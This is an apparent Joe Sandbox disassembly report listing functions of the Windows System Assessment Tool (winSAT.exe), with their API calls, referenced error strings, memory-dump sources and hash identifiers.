                                                                                                                                                                                              • String ID: > IsFormal=TRUE IsMoobe=%s.$> exit value = %d.$Cleanup and exit$ERROR: User required this run be on bateries, but the machine is not currently on batteries.$ERROR: another copy of winsat is already running$ERROR: can't run formal assessment on OS's earlier than Vista$ERROR: cannot create event: %s$ERROR: cannot create mutex: %S$ERROR: cannot reset event: %S$ERROR: cannot set control C handler!$FALSE$Global\WinSATMutex$PrivateError2$TRUE$Watch dog timer is suppressed for a formal assessment$A#$U5
                                                                                                                                                                                              • API String ID: 2331052687-1238877241
                                                                                                                                                                                              • Opcode ID: 24c345b2ecde66455f44fa867704bec9a2ba5752caf8f3e1baafbcee0677e468
                                                                                                                                                                                              • Instruction ID: 457298799e4672734ed04cb4cb38c8b6a5131cb83a540ff1ba53a345d522af21
                                                                                                                                                                                              • Opcode Fuzzy Hash: 24c345b2ecde66455f44fa867704bec9a2ba5752caf8f3e1baafbcee0677e468
                                                                                                                                                                                              • Instruction Fuzzy Hash: 05525961E0D68395EB20BB16F8502FAEB60BF81744FF49035D94E46796DEBCE548CB20

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow$Close$CriticalEnabledErrorEventLastOpenSectionValue__uncaught_exception$CommandConsoleCountCtrlCurrentDirectoryEnterFreeHandleHandlerLeaveLibraryLineMetricsMutexProcessQueryReleaseRemoveStringSystemTickTypeUninitialize_snprintf_s_vsnprintf_svswprintf_s
                                                                                                                                                                                              • String ID: > IsFormal=TRUE IsMoobe=%s.$> exit value = %d.$Cleanup and exit$ERROR: can't run formal assessment on OS's earlier than Vista$ERROR: cannot init winsat registry entries: %S$FALSE$PrivateError2$Skipping writing the Initial values to the registry - Axe Mode$TRUE$A#$U5
                                                                                                                                                                                              • API String ID: 610430588-4251460366
                                                                                                                                                                                              • Opcode ID: 80039041c9856d7e1ddefaf79e36c49a4fd9bb9cd098114acd0a909537907355
                                                                                                                                                                                              • Instruction ID: d099fe217ab1efe599d49b00ae5e09c61d4fe3370080490f06fba7212d47ba28
                                                                                                                                                                                              • Opcode Fuzzy Hash: 80039041c9856d7e1ddefaf79e36c49a4fd9bb9cd098114acd0a909537907355
                                                                                                                                                                                              • Instruction Fuzzy Hash: 89327E61E0D68395EB20FB15F8502F9BB61FF81744FF09035D68E466A9DEACE548CB20

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow$Resource$CloseLibrary$EnabledErrorEventFreeHandleLastLoadOpenValue__uncaught_exception$ConsoleCountCtrlCurrentDirectoryFindFormatHandlerLockMessageModuleMutexProcessQueryReleaseRemoveSizeofStringTickTypeUninitialize_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$ERROR: Cannot ensure winsat directory exists: %s$PrivateError2$A#
                                                                                                                                                                                              • API String ID: 182726192-3981140246
                                                                                                                                                                                              • Opcode ID: 16dd97eff7eaf70b191787b2855b9a103545096c84e45dd862aa0d4bb6796df2
                                                                                                                                                                                              • Instruction ID: 53e84a435c93e3e2f583ad3837131a219dfb5eae22665c44c6e7270a57184c30
                                                                                                                                                                                              • Opcode Fuzzy Hash: 16dd97eff7eaf70b191787b2855b9a103545096c84e45dd862aa0d4bb6796df2
                                                                                                                                                                                              • Instruction Fuzzy Hash: D90232A2E0D68795EB20FB15F8502F9B761FF81344FF09035D68E466A9DEACE544CB20

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow$Resource$CloseErrorLast__uncaught_exception$FreeHandleOpenValue$AllocateCheckConsoleCtrlDeleteDirectoryFileFindHandlerInitializeLibraryLoadLockMembershipModuleMutexQueryReleaseRemoveSizeofStringTokenTypeUninitialize
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$ERROR: $PrivateError2$cannot determine if user is running with administrative privileges$A#

                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow$Resource$Close$HandleOpenValue__uncaught_exception$ConsoleCtrlDirectoryErrorFindFreeHandlerLastLibraryLoadLockModuleMutexQueryReleaseRemoveSizeofStringTypeUninitialize
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$PrivateError2$A#

                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow$Resource$Close$EnabledEventHandleOpenValue__uncaught_exception$ConsoleCountCtrlCurrentDirectoryErrorFindFreeHandlerLastLibraryLoadLockModuleMutexProcessQueryReleaseRemoveSizeofStringTickTypeUninitialize_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$ERROR: failed COM initialization.$PrivateError2$A#

                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow$Resource$Close$HandleOpenValue__uncaught_exception$ConsoleCtrlDirectoryErrorFindFreeHandlerLastLibraryLoadLockModuleMutexQueryReleaseRemoveSizeofStringTypeUninitialize
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$PrivateError2$A#

                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow$CriticalResourceSection$EnterLeaveModule$ErrorFileFindHandleLastLoadLockNameSizeofvswprintf_s
                                                                                                                                                                                              • String ID: base\winsat\exe\WinSATOp.h$cannot find the resource$cannot get the resource size$cannot load the resource's size$cannot lock the resource in memory$canot laod string$resource string is zero zero length (invalid)$string reosurce is not null terminated$target string too small to load resource
                                                                                                                                                                                              • API String ID: 85048269-1477483317
                                                                                                                                                                                              • Opcode ID: 3c43ff0e69830a3088900ec575c8129855818ac5b2b2950fe7362f372c14f77e
                                                                                                                                                                                              • Instruction ID: 80473cec346462881a99975a872c29042306b15627fe62931ca56429ea073b3e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3c43ff0e69830a3088900ec575c8129855818ac5b2b2950fe7362f372c14f77e
                                                                                                                                                                                              • Instruction Fuzzy Hash: B202A066A18A5786EB00EB11E8144BDF761FB89B84FE48031DE4E43BA4DF7CE546C760

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow$CloseResource$OpenValue$CriticalEnabledEventHandleSection__uncaught_exception$ConsoleCountCtrlCurrentDirectoryEnterErrorFileFindFreeHandlerLastLeaveLibraryLoadLockModuleMutexProcessQueryReleaseRemoveSizeofStringTickTypeUninitializeWrite_snprintf_s_time64_vsnprintf_s
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$ERROR: can't run a formal assessment via a remote session$ERROR: no multi-media files during moobe, no MM support - just running the DWM assessment.$PrivateError2$A#
                                                                                                                                                                                              • API String ID: 1593046435-1291908742
                                                                                                                                                                                              • Opcode ID: f30cb8376c036b7314b2b6be6d4124e2b77f6d3b6334824af8bcb3c544496fa4
                                                                                                                                                                                              • Instruction ID: e38654631a438b41640397e93570c8289a2c698c03659b5190cfac5d38a615f8
                                                                                                                                                                                              • Opcode Fuzzy Hash: f30cb8376c036b7314b2b6be6d4124e2b77f6d3b6334824af8bcb3c544496fa4
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4AF130A2E0D68795EB20FB15F8502F9B761FF81344FF09035C58E466A9DEACE548CB20

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow$ErrorLast$EventResource$ConsoleCreateCtrlEnabledHandleHandlerMutex__uncaught_exception$CloseCountCurrentDirectoryFindLoadLockModuleProcessReleaseRemoveResetSizeofTickUninitialize_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$ERROR: User required this run be on bateries, but the machine is not currently on batteries.$ERROR: can't run a formal assessment on batteries$PrivateError2$A#
                                                                                                                                                                                              • API String ID: 1955473893-3736981142
                                                                                                                                                                                              • Opcode ID: 4be07b2bb223d74f9d019a6ea4b05025570757569afd096574fae95daf19b5c9
                                                                                                                                                                                              • Instruction ID: 0b64cacebee4f622cc6b4f4361c2d171180b459733b960ba39f2c8fbddc88b84
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4be07b2bb223d74f9d019a6ea4b05025570757569afd096574fae95daf19b5c9
                                                                                                                                                                                              • Instruction Fuzzy Hash: C60250A1E0D68795EB20FB15F8502F9E761FF81344FF49035C58E466A9DEACE544CB20

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
• Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow$ErrorFileInfoLastVersion$Size
                                                                                                                                                                                              • String ID: \StringFileInfo\%04X%04X\FileDescription$\StringFileInfo\%04X%04X\InternalName$\VarFileInfo\Translation$base\winsat\exe\app.cpp$cannot find the version information in %s$cannot get application description from %s$cannot get the applicatno title from %s$cannot load the version information from %s$version infomratino not found in %s
                                                                                                                                                                                              • API String ID: 1970463299-574011123
                                                                                                                                                                                              • Opcode ID: daacf999211bac3c3cbd8e9461f84228cf19f7903a7e38890608c88c3565f534
                                                                                                                                                                                              • Instruction ID: c33b1ff76f8d4c04587c0d80ff14a65296dbbb303f5711b59da202bf32aee734
                                                                                                                                                                                              • Opcode Fuzzy Hash: daacf999211bac3c3cbd8e9461f84228cf19f7903a7e38890608c88c3565f534
                                                                                                                                                                                              • Instruction Fuzzy Hash: EDC13D66A09A47C6EB14BF16E8501B8B760FF85B98BF09035DA0E137A5DF7DE904C720

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
• Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow$ErrorLast$FileModuleName
                                                                                                                                                                                              • String ID: %SystemRoot%\system32\WinSAT.exe$%WINSAT%$Private > Winsat aux environment string is '$SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinSAT$\Private$base\winsat\exe\app.cpp$cannot load module title
                                                                                                                                                                                              • API String ID: 1694354162-568184922
                                                                                                                                                                                              • Opcode ID: 1d4f7037371eb10e463b2bffa1485248664b458afc5f4475ea499e8910b523ee
                                                                                                                                                                                              • Instruction ID: b23dc54060e7e25e92ed3d902aaad4273dc2e9a76f979673d154919406760aae
                                                                                                                                                                                              • Opcode Fuzzy Hash: 1d4f7037371eb10e463b2bffa1485248664b458afc5f4475ea499e8910b523ee
                                                                                                                                                                                              • Instruction Fuzzy Hash: 83128A22A0DA4289EF44FF22D8501B8A760FF41B98BA4A131EA0E177D6DF7CE555C360

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
• Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast$EnabledEvent$CountCurrentFormatFreeLocalMessageProcessTick_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: <Message>$ <Hresult>$ </Error>$ <Error>$ </ErrorsAndWarnings>$ <ErrorsAndWarnings>$</AssessmentResult>$</Hresult>$</Message>$<?xml version="1.0" encoding="UTF-8" standalone="yes"?>$<AssessmentResult>$AxeErrorXML: Error creating results.xml file.$Can't write error message '%s' to the registry$Can't write last exit code %u to the registry$Cannot open registry value %s$Cannot open winsat registry key$Cannot read registry value %s$Cannot write registry value %s$ERROR: failed to save can't and why error mesages to the registry$LastExitCode$LastExitCodeCantMsg$LastExitCodeWhyMsg$SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinSAT$Skipping writing the exit code, cant msg and why msg to registry$Unspecified error %u occured.$Writing exit code, cant msg and why msg to registry $base\winsat\exe\processwinsaterror.cpp$results.xml$w, ccs=UTF-8
                                                                                                                                                                                              • API String ID: 3131830483-4286113941
                                                                                                                                                                                              • Opcode ID: 26a9d983f1d58d7053ba85c5d56a9019545f4cb55e188ab8bd7b0d6d368bb9a9
                                                                                                                                                                                              • Instruction ID: 340079989d89b07db99972c1ac93a6819d53e5b0308ae5c8da6b10a03a498ba6
                                                                                                                                                                                              • Opcode Fuzzy Hash: 26a9d983f1d58d7053ba85c5d56a9019545f4cb55e188ab8bd7b0d6d368bb9a9
                                                                                                                                                                                              • Instruction Fuzzy Hash: BE125E21A0D99291FA60BB11E4523FAE360FF81718FE48431D68D46BDADE7CF946C721

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
• Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
• Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast$Library$ConsoleCtrlDirectoryFreeHandlerHeapInformationLoadRemoveUninitializeVersion
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$ERROR: cannot initialize handle streams$Kernel32.dll$PrivateError2$base\winsat\exe\main.cpp$A#
                                                                                                                                                                                              • API String ID: 2285653341-2875148813
                                                                                                                                                                                              • Opcode ID: 5cd9e2d094684c900b0a1822dbd1beab9fb2b5d15797ac5c376e857a1df992c8
                                                                                                                                                                                              • Instruction ID: feb504a3e82826df83896d265925d6554e305c87b82159c7a5afc1ce9cb0cb14
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5cd9e2d094684c900b0a1822dbd1beab9fb2b5d15797ac5c376e857a1df992c8
                                                                                                                                                                                              • Instruction Fuzzy Hash: 03917E20E0D68285FB60BB11F8502BAEBA0BF85758FF49035D94E027E5DEACF454CB20
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
• Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
• Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow$Handle$ConsoleCreateErrorFileInformationLastOutput
                                                                                                                                                                                              • String ID: CONOUT$
                                                                                                                                                                                              • API String ID: 3315080193-3130406586
                                                                                                                                                                                              • Opcode ID: 1d280d1140a609a4120c229eabe1faaa780790c509dd60a0aca176df560ac830
                                                                                                                                                                                              • Instruction ID: 85a74f63ab5352ecd65863a122748accec8442d77c033781aeb52a0d607d8206
                                                                                                                                                                                              • Opcode Fuzzy Hash: 1d280d1140a609a4120c229eabe1faaa780790c509dd60a0aca176df560ac830
                                                                                                                                                                                              • Instruction Fuzzy Hash: A3917022A0C64782EF00BF15E854278AB61FF81BA4FA49235DA6D177E8DF7CE405C720
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
• Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
• Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow$Resource$Close$CriticalEnabledEventHandleOpenSectionValue__uncaught_exception$ConsoleCountCtrlCurrentDirectoryEnterErrorFileFindFreeHandlerLastLeaveLibraryLoadLockModuleMutexProcessQueryReleaseRemoveSizeofStringTickTypeUninitializeVersionWrite_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: > IsFormal=TRUE IsMoobe=%s.$> exit value = %d.$Cleanup and exit$ERROR: can't run formal assessment on OS's earlier than Vista$FALSE$PrivateError2$TRUE$A#$U5
                                                                                                                                                                                              • API String ID: 3609148696-4083962618
                                                                                                                                                                                              • Opcode ID: 0239aa5fd20ae61fbb236b0a29be8b192bc8d37e31c6169b1712d043d27c94a7
                                                                                                                                                                                              • Instruction ID: f11b958aa92d5b8fc14d2f8a5af622dcc462b61e1b80ed87ab309aa65e918ef9
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0239aa5fd20ae61fbb236b0a29be8b192bc8d37e31c6169b1712d043d27c94a7
                                                                                                                                                                                              • Instruction Fuzzy Hash: E4916E20E0D68385FB60BB11B8511BAEB50BF85B88FF89035D94E067E6DEADB454C760
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00007FF780FA941C: SetLastError.KERNEL32 ref: 00007FF780FA944C
                                                                                                                                                                                              • CreateFileW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDD45
                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDD69
                                                                                                                                                                                              • SetEndOfFile.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDD8E
                                                                                                                                                                                              • SetFilePointer.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDDA9
                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDDC1
                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDDDC
                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDE11
                                                                                                                                                                                              • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDE24
